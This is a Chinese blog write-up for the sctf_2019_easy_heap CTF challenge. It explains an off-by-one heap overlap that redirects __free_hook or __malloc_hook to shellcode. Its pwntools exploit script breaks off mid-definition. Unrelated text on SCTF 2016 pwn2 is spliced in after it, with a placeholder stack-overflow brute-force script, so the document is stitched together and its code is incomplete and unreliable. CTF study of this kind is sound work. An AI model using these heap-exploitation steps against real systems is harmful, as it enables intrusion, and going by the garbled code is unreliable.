sctf_2019_easy_heap

本文介绍了sctf_2019_easy_heap挑战的解决思路,由于保护全开,只能通过修改__malloc_hook或__free_hook。存在off-by-one漏洞,可以利用overlap技术。通过泄露的Mmap地址,将__free_hook或__malloc_hook指向shellcode所在的内存区域,从而获取shell。文章详细分析了main、add、Free和Edit函数,并提出了利用大型bin快速实现目标的策略。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

sctf_2019_easy_heap

在这里插入图片描述

保护全开,所以又只能修改__malloc_hook,或者说__free_hook了。

函数分析:

main函数

在这里插入图片描述在这里插入图片描述

add函数

在这里插入图片描述

Free函数

在这里插入图片描述

Edit函数

在这里插入图片描述
在这里插入图片描述

下面的函数中有一个off-by-one的漏洞,所以我们可以很自然的想到overlap

思路

首先,程序在运行的时候泄露了一段Mmap的地址,至于给了一个地址,那一定是有用的东西,这里可以思考,是不是可以直接往里面写一段shellcode,然后把__free_hook或者说__malloc_hook改成前面的Mmap的地址里,就可以getshell。

然后就是add完了之后,会给一个heap的地址,也就是说按照一般思路我们可以少泄露一个地址。

这里既然限制了chunk的数量,那么说要存留一个main_arena附近的值最好就是用large_bin了,又快又好用。用完overlap之后,直接用修改两个小chunk的fd,让他能指向自己想要的地方。

# -*- coding: UTF-8 -*-
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
local_file  = './sctf_2019_easy_heap'
libc = ELF('/home/yjc/Desktop/Libc/U18/libc-2.27-64.so')
select = 1

if select == 0:
    p = process(local_file)
    #gdb.attach(p)
else:
    p = remote('node4.buuoj.cn',29641)
    #libc = ELF(remote_libc)
elf = ELF(local_file)


def 
### 关于 SCTF 2016 中 pwn2 题目的解析 在 SCTF (Security Capture The Flag) 2016 的比赛中,`pwn2` 是一道涉及栈溢出漏洞利用的题目[^1]。此题允许参赛者通过特定输入来覆盖返回地址并控制程序执行流程。 #### 漏洞环境描述 该挑战提供了一个存在缓冲区溢出缺陷的应用程序实例。应用程序接收用户输入作为处理对象,在缺乏适当边界检查的情况下将其复制到固定大小的内存区域中。这种设计使得攻击者能够精心构造恶意数据包以破坏堆栈结构,并最终实现任意代码执行的目的。 #### 解决方案概述 为了成功完成这一任务,参与者通常采取以下策略: - **确定偏移量**:首先需要找到合适的字节填充数量以便精确地覆盖目标位置而不影响其他重要部分的数据完整性。 - **泄露 SSP 地址**:由于开启了 Stack Smashing Protector(SSP),即栈保护机制,因此还需要想办法获取其实际值用于后续操作中的调整校验计算。 - **定位 libc 基础地址**:如果远程服务器上使用的 glibc 版本未知,则可能需借助某些方法推测或直接读取相关指针从而得知确切基址。 - **构建有效载荷**:最后一步就是组合上述信息形成完整的 exploit chain ,比如采用 ret2libc 技巧调用 system 函数启动 shell 或者跳转至已知 gadgets 实现相同效果。 ```python from pwn import * context(log_level="debug") flag_addr = 0x600DC0 for attempt in range(1, 101): try: conn = remote('example.com', port_number) padding = b'a' * offset_to_return_address # 计算得出的确切偏移量 payload = ( padding + pack(flag_addr, 64) + ... # 可能还包括其他的 ROP chains 组件 ) conn.recvuntil(prompt_string) conn.sendline(payload) response = conn.recvall(timeout=timeout_seconds).decode() print(f"[Attempt {attempt}] Received: ", response.strip()) if success_pattern in response.lower(): break except Exception as e: log.error(e) finally: conn.close() if not 'success pattern found': raise ValueError("Failed after multiple attempts.") ``` 这段 Python 脚本展示了如何自动化尝试连接服务端发送特制请求的过程。注意这里 `offset_to_return_address`, `prompt_string`, 和 `port_number` 等变量都需要根据实际情况设定具体的数值;而 `pack()` 方法用来创建适合架构位宽的机器码表示形式。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值